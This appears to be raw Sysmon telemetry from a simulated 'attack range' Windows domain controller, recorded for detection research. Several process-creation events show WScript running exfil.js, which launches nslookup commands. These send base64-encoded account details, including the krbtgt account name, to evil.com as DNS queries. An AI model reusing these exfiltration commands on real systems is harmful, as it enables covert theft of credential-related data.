10341000x8000000000000000197981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.396{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.396{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.396{2E1864BB-17B7-629A-723F-000000005F02}6527340C:\Windows\system32\cmd.exe{2E1864BB-17B7-629A-743F-000000005F02}6932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.405{2E1864BB-17B7-629A-743F-000000005F02}6932C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B7-629A-723F-000000005F02}652C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlikw.tmp 2>&1 10341000x8000000000000000197977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.374{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-733F-000000005F02}968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.374{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-733F-000000005F02}968C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.359{2E1864BB-17B7-629A-733F-000000005F02}9686248C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-723F-000000005F02}652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.359{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-733F-000000005F02}968C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.343{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.343{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.343{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.343{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.343{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-723F-000000005F02}652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.343{2E1864BB-17A1-629A-783D-000000005F02}5552924C:\Windows\System32\WScript.exe{2E1864BB-17B7-629A-723F-000000005F02}652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.352{2E1864BB-17B7-629A-723F-000000005F02}652C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlikw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.343{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlodr.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.311{2E1864BB-17B7-629A-703F-000000005F02}73046960C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-713F-000000005F02}420C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.311{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.311{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.311{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.311{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.311{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-713F-000000005F02}420C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.311{2E1864BB-17B7-629A-6F3F-000000005F02}57927804C:\Windows\system32\cmd.exe{2E1864BB-17B7-629A-713F-000000005F02}420C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.318{2E1864BB-17B7-629A-713F-000000005F02}420C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B7-629A-6F3F-000000005F02}5792C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlodr.tmp 2>&1 10341000x8000000000000000197957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.275{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-703F-000000005F02}7304C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.275{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-703F-000000005F02}7304C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.258{2E1864BB-17B7-629A-703F-000000005F02}73046960C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-6F3F-000000005F02}5792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.242{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-703F-000000005F02}7304C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.227{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-6F3F-000000005F02}5792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.227{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.227{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.227{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTE